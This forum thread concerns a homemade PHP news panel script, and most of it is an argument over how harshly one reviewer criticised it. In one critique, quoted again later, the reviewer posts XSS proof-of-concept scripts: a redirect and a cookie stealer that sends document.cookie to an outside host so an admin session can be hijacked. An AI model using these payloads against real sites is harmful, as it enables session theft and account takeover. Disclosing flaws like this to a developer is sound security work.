[Release] News script

G'day ladies and gentlemen!

I have been working on a news script recently for my website and decided to release it to the public. I decided to call it 'news panel' for the simplicity of its name. What News Panel does is add, edit, delete news posts and it also allows you to edit your details and has a log which shows what everyone has done. I.E "Blinger failed to login with the IP xxx.xxx.x.x.x on the 17/12/2008" etc.

I done all the coding except the layout where i wanna thank iszak :eusa_shif
It should be used as a learning purpose for those who need it. You can also use it fully but i'm not sure if the security is good enough (it should be :D!)

Read the readme.txt for more information.

Here are a few pictures:

Show Hide

http://freyta.net/scripts/newspanel/activitylog.PNG

http://freyta.net/scripts/newspanel/addnews.PNG

http://freyta.net/scripts/newspanel/edit.png

http://freyta.net/scripts/newspanel/editnews.PNG

http://freyta.net/scripts/newspanel/index.PNG

http://freyta.net/scripts/newspanel/previewnews.PNG

http://freyta.net/scripts/newspanel/users.PNG

http://freyta.net/scripts/newspanel/usersfreyta.PNG

edit:

Link to download: herehttp://www.freyta.net/scripts/newspanel/newspanel.zip

Good release.

oh yeah.. maybe a download link?

http://www.freyta.net/scripts/newspanel/newspanel.zip

Didn't know you were going to mention me in coding the layout - you didn't have to. It was a simple layout, plus you edited it / added your own style etc. How'd you get my last name too? :P

Haha, i thought it was only right if i did.
I included the PSD so if someone wants to make their own layout they can etc.

And you wrote it in the thing "author: iszak xxxxxxx" blahblah :p

Ask some of the 'hackaz' to see if they can breach it, so you know what needs patching up. Then you'll know it's secure! ^_^

Damn those meta tags! Yeah, it's my default template that has the meta tag with my name unfortunately. Congratulations on your release, anything else in the future maybe?

I think so, i liked the idea that guy had of a habbo auction thing.. But that would be done after my holiday :)

It's not really - but if I was going to do it I'd learn OOP if you don't already, because a project that size may get messy. But I already know OOP, so yeah. Maybe something on the smaller scale? Like a content management system, yes I know there are plenty around - but just to get your skills up.

Great.

I wanted one of these, (except Cutenews).

I use this for my site soon...

+Rep if i can.

The only downfall is there is no BBCODE.

Quote:

---

Originally Posted by Excellent2

The only downfall is there is no BBCODE.

---

Good point.

@thread starter, look up str replace or w/e function u wanna use. bbcode is easy, it's when u start javascript things bcome hard.

Maybe you excellent with your skills you should re-release his script with BB markup ;)

Quote:

---

Originally Posted by Protege

Maybe you excellent with your skills you should re-release his script with BB markup ;)

---

Lmao Protege. Now i have to decide wether you were being sarcastic or serious :eusa_wall

And i am busy doing something else at the moment, but i suppose i could put bbcode into it?

I don't get this javascript thing yet so here is the script with just smilies and basic ([b] [/b ], [u][/ u], [i] [/i ]) functions.

What other kind of BB-Codes would you want?

Here is an updated link

I'd never be sarcastic to a fellow habbox'r. Who you take me for? :) Actually - don't answer that 8-)

Quote:

---

Originally Posted by Blinger

I don't get this javascript thing yet so here is the script with just smilies and basic ([b] [/b ], [u][/ u], [i] [/i ]) functions.

What other kind of BB-Codes would you want?

Here is an updated link

---

BBCODE is not necessarily javascript, and in the way that people we're saying it, they meant learn how to use str_replace, so it looks in the string for "[b]" and replaces it with "<b>", simple.

Oh, i did that :)

Quote:

---

Originally Posted by Calon

BBCODE is not necessarily javascript, and in the way that people we're saying it, they meant learn how to use str_replace, so it looks in the string for "[b]" and replaces it with "<b>", simple.

---

Hehe i didn't mean javascript as in BBCodes sorry. I didn't explain myself.

I meant javascript as a language, IMO it's hard :P

I don't understand what javascript has to do with this thread.

Nice release by the way, keep adding any features you can think of and you may be able to turn it into something possibly sellable.

Quote:

---

Originally Posted by Jxhn

I don't understand html soz

---

Well basically all i said was "BBCOde is easy, when u start javascript it gets hard".

I was just stating a point

Quote:

---

Originally Posted by Jackboy

Well basically all i said was "BBCOde is easy, when u start javascript it gets hard".

I was just stating a point

---

Uncalled for. "/

It was still irrelevant. Like someone saying "You're good at football, but you don't tackle enough" and you coming in with "If you think tackling is hard you should try to play cricket, I can."

Quote:

---

Originally Posted by Jxhn

Uncalled for. "/

It was still irrelevant. Like someone saying "You're good at football, but you don't tackle enough" and you coming in with "If you think tackling is hard you should try to play cricket, I can."

---

Hardly, because I spoke about javascript because it can be and is often used with PHP.

And I suppose it wasn't completely relevant, but I was just stating a point. Your example was bad too :P

Okay.. I don't get why you've done quite a bit on this thing.. first off..

Why the hell can you view the navigation, latest news, and other bits.. without being logged in? I mean seriously.. why would anyone need to know the location of some of the pages "editnews.php" when they're not logged in?

That just makes it more vulnerable.

http://www.tehupload.com/uploads/app...1146864641.png

--------------------------------------

Second.. your coding is absolutely horrible.. I mean seriously.. all you're doing is repeating code OVER and OVER.

Everytime you clean something.. you repeat the same lines..

PHP Code:

---

        $username = stripslashes($username);
        $password = stripslashes($password);

        $username = mysql_real_escape_string($username);
        $password = mysql_real_escape_string($password); 


---

Then to make things even funnier.. you do separate queries for updating the same things!

PHP Code:

---

            mysql_query("UPDATE users SET LastLogin = '$LastLogin' WHERE Username = '$username' AND Password = '$password'");

            // Update last login ip address
            mysql_query("UPDATE users SET LastLoginIP = '$LastLoginIP' WHERE Username = '$username' AND Password = '$password'"); 


---

Do you really not know how to code? I mean seriously.. two queries to update the same table with that small bit of information.. my god.

---------------------------------------

Third.. you don't make it other-site compatible!

PHP Code:

---

header('location: http://www.freyta.net/newspanel/'); 


---

There's a lot of code to change to make this stupid thing work..

---------------------------------------

Fourth.. why the hell are you doing ob_start() AND session_start().. I see not one place in this where you are working with buffers/cookies.. at all.. so why do you need it?

---------------------------------------

Fifth.. you have no primary key in users! What's the point in id if it's not autoenc and a primary key?

http://www.tehupload.com/uploads/app...8269945445.png

http://www.tehupload.com/uploads/app...4232900458.png

---------------------------------------

This really works / looks good :rolleyes:

Very much aligned..

http://www.tehupload.com/uploads/app...6250890648.png

---------------------------------------

Very good protection against XSS! Very much..

http://www.tehupload.com/uploads/app...5551292735.png

http://www.tehupload.com/uploads/app...6244368059.png

---------------------------------------

You're not a consistant coder at all.. one minute you're doing **** like this:

http://www.tehupload.com/uploads/app...5419684422.png

Then this..

http://www.tehupload.com/uploads/app...0116054974.png

Stick with something for god sakes..

---------------------------------------

LOL at this! What a good query..

PHP Code:

---

$sql = "INSERT INTO activity (username,activity, ip, date) VALUES ('" . $author . "', '" . $activity . "', '" . $IP . "', '" . $date . "')"; 


---

Have you never heard of inserting variables into a string? My god..

PHP Code:

---

$sql = "INSERT INTO `activity` (`username`, `activity`, `ip`, `date`) VALUES('{$author}', '{$activity}', '{$IP}', '{$date}')"; 


---

Because that was so hard..

---------------------------------------

Back to the XSS thing.. so now that we've proved it has XSS vulnerabilites.. how easy is it to take over the entire panel.. now that the "Latest News" is shown to anyone who views the panel.. logged in or not..

This is easy..

http://www.tehupload.com/uploads/app...7734761346.png

But what about something like this?

Code:

---

<script>window.location = "http://www.google.com";</script>

---

Of course redirecting it to a much.. how can I say.. annoying? Site would be just as easy..

Or we could get even more advanced (if the panel had user levels).. and begin stealing admin's sessions..

Code:

---

<script type="text/javascript">
var div = $('header');
var element = document.createElement('img');
element.src="http://mysite.com/test.php?cookie="+encodeURI(document.cookie);
element.style.display = "none";
div.appendChild(element);
</script>

---

How about something like that? Now we have the user's PHPSESSID and can easily "become them".. because all you check is the $_SESSION['username'].. nothing else..

how secure..

---------------------------------------

All I can say.. is this is a pile of crap.. it halfway works.. looks like crap.. extremely bad coding.. extremely insecure.. and I wouldn't recommend anyone use it.

There are LOADS more things I could say.. and point out.. almost all the panel's coding has at least something to laugh at..

I've went through about 3 of the pages.. and it was a laugh fest.. so maybe you should work on that ;)


0.5/10

- Caleb

There was no need for all of that Caleb..

Quote:

---

Originally Posted by Excellent2

There was no need for all of that Caleb..

---

I saw a need for it.. and that's what matters.. considering it was my post :rolleyes:.

He's releasing it for the public to use.. and it should be proven that it's not safe enough to be used on a public site, nor is it of quality coding.

I don't really see a need for your post above.. ;)

What was the need in really insulting his project beyond beleif? Instead you could have just pointed out where he's gone wrong in a mature and sensible manner? Everybody has to start somewhere. It looks like it's his first project.. stop being such a jackass.

Quote:

---

Originally Posted by Excellent2

What was the need in really insulting his project beyond beleif? Instead you could have just pointed out where he's gone wrong in a mature and sensible manner? Everybody has to start somewhere. It looks like it's his first project.. stop being such a jackass.

---

I did point out where he has "gone wrong".. my post is full of ways to interpret how he has gone wrong..

I know he has to "start somewhere".. but if someone doesn't correct the problems he has now.. he's going to turn out to be a coder like you and various other ones.. with misc. bad habits and coding problems.. and ego issues.

Your opinion on "being a jackass" just sums up pretty much your attitude. I'll be a "jackass" if I want to, you're not anyone to stop me.

Quote:

---

Originally Posted by Excellent2

What was the need in really insulting his project beyond beleif? Instead you could have just pointed out where he's gone wrong in a mature and sensible manner?

---

You're asking for someone to be mature and have a sensible manner on HabboxForum? You must be new here :P.

Quote:

---

Originally Posted by Dentafrice

I did point out where he has "gone wrong".. my post is full of ways to interpret how he has gone wrong..

I know he has to "start somewhere".. but if someone doesn't correct the problems he has now.. he's going to turn out to be a coder like you and various other ones.. with misc. bad habits and coding problems.. and ego issues.

Your opinion on "being a jackass" just sums up pretty much your attitude. I'll be a "jackass" if I want to, you're not anyone to stop me.

---

I didn't say you didn't point out where he went wrong but there was no need to be so abusive and arrogant.

I didn't say anything about you helping him with his coding but when you're insulting him and his project like that it's not right. I don't get how I have ego issues? You should look at your posts and then tell me has the ego. Atleast now I can tell what is right and what is wrong.

Granted I'm not one to stop you but if you really gave a damn about his project you should stop using childish comments like this:

Quote:

---

All I can say.. is this is a pile of crap.. it halfway works.. looks like crap..

---

Quote:

---

almost all the panel's coding has at least something to laugh at..

---

If thats not being a jackass I don't know what is? You started somewhere once and you've developed into one of them egotistical, arrogant people who now think they're better than anybody in anyway possible. Don't think by that I'm saying you're a bad coder because if I did, I'd be lying but I'm sure if you try out a language you don't know and ask for help someone would reply in a much more helpful and mature way.

Learn to structure your criticism around when you first started.

Quote:

---

Originally Posted by Dentafrice

Very good protection against XSS! Very much..

http://www.tehupload.com/uploads/app...5551292735.png

http://www.tehupload.com/uploads/app...6244368059.png

---------------------------------------

Back to the XSS thing.. so now that we've proved it has XSS vulnerabilites.. how easy is it to take over the entire panel.. now that the "Latest News" is shown to anyone who views the panel.. logged in or not..

This is easy..

http://www.tehupload.com/uploads/app...7734761346.png

But what about something like this?

Code:

---

<script>window.location = "http://www.google.com";</script>

---

Of course redirecting it to a much.. how can I say.. annoying? Site would be just as easy..

Or we could get even more advanced (if the panel had user levels).. and begin stealing admin's sessions..

Code:

---

<script type="text/javascript">
var div = $('header');
var element = document.createElement('img');
element.src="http://mysite.com/test.php?cookie="+encodeURI(document.cookie);
element.style.display = "none";
div.appendChild(element);
</script>

---

How about something like that? Now we have the user's PHPSESSID and can easily "become them".. because all you check is the $_SESSION['username'].. nothing else..

how secure..

0.5/10

- Caleb

---

It's a news panel not a forum, normal user aren't supposed to be able to post news at all which is probably why there's no way of registering. Unfortunately there's no way of admins to register as well apart from md5ing their own password and adding themselves by phpMyAdmin. There's quite a few bad things about this panel, but there isn't an XSS risk where you pointed it out.

Quote:

---

Originally Posted by Excellent2

I didn't say you didn't point out where he went wrong but there was no need to be so abusive and arrogant.

I didn't say anything about you helping him with his coding but when you're insulting him and his project like that it's not right. I don't get how I have ego issues? You should look at your posts and then tell me has the ego. Atleast now I can tell what is right and what is wrong.

Granted I'm not one to stop you but if you really gave a damn about his project you should stop using childish comments like this:




If thats not being a jackass I don't know what is? You started somewhere once and you've developed into one of them egotistical, arrogant people who now think they're better than anybody in anyway possible. Don't think by that I'm saying you're a bad coder because if I did, I'd be lying but I'm sure if you try out a language you don't know and ask for help someone would reply in a much more helpful and mature way.

Learn to structure your criticism around when you first started.

---

When I started coding.. I got the same criticism and "immature" comments that I give now.

If you can't learn to take criticism and rude posts.. you're not going to make anything out of yourself.. and you'll develop bad habits.

I don't think I'm better then anybody in anyway possible.. I know quite a few people who will always be better then me..

1. Tomm
2. Mentor
3. Tomlegend
4. JustOne
5. Baving
6. Jin

and I treat everyone of those people with the respect they deserve.. and look up to quite a few of them.

And your comment above..

I really don't give a damn about his project.. it's not going to get anywhere.. it might be something 'fun' for him to do when he gets home from school..

I told him what I thought of it, and that's all I'm going to do.

You can reply with however you like, but my opinion is my opinion.. and if I want to express it in the way that I do, I will continue to do so.. because most of the time.. the criticism that I give.. gets to that person's head.. and makes them a better coder..

I've been here long enough, seen plenty of projects pass by, and gave countless posts of pure rudeness.. and I see those people today, and those projects.. and they're 95x better at what they're doing then I ever thought they would.

It all depends on how you take it..

Apparently you didn't get criticized enough.

Quote:

---

Originally Posted by Jxhn

It's a news panel not a forum, normal user aren't supposed to be able to post news at all which is probably why there's no way of registering. Unfortunately there's no way of admins to register as well apart from md5ing their own password and adding themselves by phpMyAdmin. There's quite a few bad things about this panel, but there aren't any XSS risks.

---

Of course it's not a forum.. no-one ever said it was..

You're telling me there aren't any XSS risks.. when I just proved it. Say you hired a member of staff.. he posted news.. he got a bit unruly and started hiding some code within his posts..

He could redirect the site anytime he wanted.. use JS to change anything he wanted on the site..

That's XSS flaws right there.. so please don't tell me "there aren't any.." when there is.

Why are you flaming Caleb, when he has brought up many SERIOUS issues and areas which anyone could access, with the script?
If he had never posted then the author wouldn't know where his code has vunerabilities and how to fix them.

Quote:

---

Originally Posted by Dentafrice

When I started coding.. I got the same criticism and "immature" comments that I give now.

If you can't learn to take criticism and rude posts.. you're not going to make anything out of yourself.. and you'll develop bad habits.

I don't think I'm better then anybody in anyway possible.. I know quite a few people who will always be better then me..

1. Tomm
2. Mentor
3. Tomlegend
4. JustOne
5. Baving
6. Jin

and I treat everyone of those people with the respect they deserve.. and look up to quite a few of them.

And your comment above..

I really don't give a damn about his project.. it's not going to get anywhere.. it might be something 'fun' for him to do when he gets home from school..

I told him what I thought of it, and that's all I'm going to do.

You can reply with however you like, but my opinion is my opinion.. and if I want to express it in the way that I do, I will continue to do so.. because most of the time.. the criticism that I give.. gets to that person's head.. and makes them a better coder..

I've been here long enough, seen plenty of projects pass by, and gave countless posts of pure rudeness.. and I see those people today, and those projects.. and they're 95x better at what they're doing then I ever thought they would.

It all depends on how you take it..

Apparently you didn't get criticized enough.

---

You're entitled to your opinion and I respect your opinion but I just ask that you try not to belittle everybody because they're not at your level. Is that too much to ask or what?

Quote:

---

Originally Posted by TomSpit

Why are you flaming Caleb, when he has brought up many SERIOUS issues and areas which anyone could access, with the script?
If he had never posted then the author wouldn't know where his code has vunerabilities and how to fix them.

---

Thank you :) +REP. Finally someone with some sense haha.

Quote:

---

Originally Posted by Excellent2

You're entitled to your opinion and I respect your opinion but I just ask that you try not to belittle everybody because they're not at your level. Is that too much to ask or what?

---

I don't try to belittle everyone.. I never once said I was better at PHP then him (in a direct way). I told him what I thought of the project.. and pointed out the flaws in it.

Quote:

---

Originally Posted by Excellent2

You're entitled to your opinion and I respect your opinion but I just ask that you try not to belittle everybody because they're not at your level. Is that too much to ask or what?

---

He just brought the vunerabilites of the script to attention. He isn't trying to put down the creator.

Quote:

---

Originally Posted by TomSpit

He just brought the vunerabilites of the script to attention. He isn't trying to put down the creator.

---

"All I can say.. is this is a pile of crap.. it halfway works.. looks like crap.. extremely bad coding.. extremely insecure".

Quote:

---

Originally Posted by Invent

"All I can say.. is this is a pile of crap.. it halfway works.. looks like crap.. extremely bad coding.. extremely insecure".

---

He's putting down the php coding, not the creator :D Anyway, I think the creator should be glad Caleb posted, he will learn from his mistakes now.

Quote:

---

Originally Posted by Dentafrice

I don't try to belittle everyone.. I never once said I was better at PHP then him (in a direct way). I told him what I thought of the project.. and pointed out the flaws in it.

---

No but comments such as "it was laughable" were really not needed were they?

Quote:

---

Originally Posted by TomSpit

He just brought the vunerabilites of the script to attention. He isn't trying to put down the creator.

---

Where did I say that he shouldn't have mentioned the flaws in his script? All I said was there was no need for some of the comments used.

Quote:

---

Originally Posted by TomSpit

He's putting down the php coding, not the creator :D Anyway, I think the creator should be glad Caleb posted, he will learn from his mistakes now.

---

That's right.

I never once said "you're an idiot you stupid piece of **** you'll never make it anywhere with coding like that you stupid idiot."

I just said the coding was horrible. If he wants to take it and let it "put him down", so be it.